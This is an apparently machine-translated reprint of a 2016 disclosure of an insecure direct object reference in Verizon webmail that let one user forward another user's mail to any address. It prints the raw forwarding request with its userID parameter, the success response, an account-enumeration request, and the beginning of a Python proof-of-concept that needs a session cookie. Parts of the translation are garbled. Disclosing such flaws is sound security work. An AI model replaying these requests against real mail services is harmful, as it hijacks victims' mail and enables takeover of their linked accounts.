Verizon mailbox now wonderful vulnerability, personal mail can be forwarded to any mailbox-vulnerability warning-the black bar safety net

2016-06-18T00:00:00
ID MYHACK58:62201676031
Type myhack58
Reporter 佚名
Modified 2016-06-18T00:00:00

Description

Verizon is America's Big Three telecommunications giants. A recent Verizon security personnel found the Verizon mailbox system there is a high risk vulnerability can lead to a Verizon mailbox user's mail is any forwarding to other mailbox accounts. Below this screenshot is a Verizon mailbox of a provided interface, and its function is for the user to put their Verizon mailbox to receive the push messages to another mailbox account. Its process is like a message sent to a Verizon mailbox, then the Verizon mailbox and put the email pushed to the user settings of another mailbox. ! Verizon mailbox setup interface The security researcher first in the local open proxy, then began to grab the data Pack. His first simulate the normal operation of the user, and set up a push mailbox. Then grab the Send request packet. At the bottom of the data packet within the code, we can see this is a very normal POST data packet, but in the userID there may be a IDOR(Insecure Direct Object References)vulnerability, because of the direct reference to the object is very unsafe. POST https://mail.verizon.com/webmail/driver?nimlet=ispemailsettings&method=addForward HTTP/1.1 Host: mail.verizon.com Connection: keep-alive Content-Length: 1 6 9 Pragma: no-cache Cache-Control: no-cache Origin: https://mail.verizon.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: REMOVED

sourceID=&auth=&auditID=&serviceName=MPSMail&userID=vzeREMOVED%40verizon. net&forwardAddress=REMOVED%2Bverizon%40gm Then the bottom is the return back of the packet { "res": { "Response": { "DataOut": { "User": { "ID": "vzeREMOVED", "ForwardAddress": "REMOVED+verizon@gmail.com" } }, "xsi:noNamespaceSchemaLocation": "", "xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance", "Errors": { "Error": { "Description": "", "Severity": "Success", "Type": "", "Number": "0" } }, "Control": { "Source": { "ID": "", "Auth": "", "AuditID": "" }, "Service": { "Name": "MPSMail", "Action": "AddForward" } } } } } Verizon employee mailboxes are mostly published on the Internet, such as customer service mailbox, sales mailbox, etc., and they also specifically discloses an API interface to view which mailboxes are registered. Below the data packet is a transmission request of data package that can allow hackers to take an enumeration of the ways to get most of the Verizon mailbox account. Host: mail.verizon.com Connection: keep-alive Content-Length: 2 8 Pragma: no-cache Cache-Control: no-cache Origin: https://mail.verizon.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: REMOVED

&alias=REMOVED@verizon.net The return data packet { "res": [{ "alias": "REMOVED@verizon.net", "mailID": "vzeREMOVED@verizon.net" }] } Suppose there is a hacker, he put a push notification data packet in the userID parameter to change for the other person's mailbox. Then when that person received other people's mail is also pushed to the hacker's own settings of a mailbox, such as the Facebook change of password email, banking email, etc. In order to cause the Version inside of the attention, the employee also wrote a Python script to demonstrate this harm. import urllib import requests from Cookie import SimpleCookie

""" A valid webmail login is required. Login to https://mail.verizon.com/ and paste in your Cookie header """ cookie_str = 'REMOVED'

[1] [2] next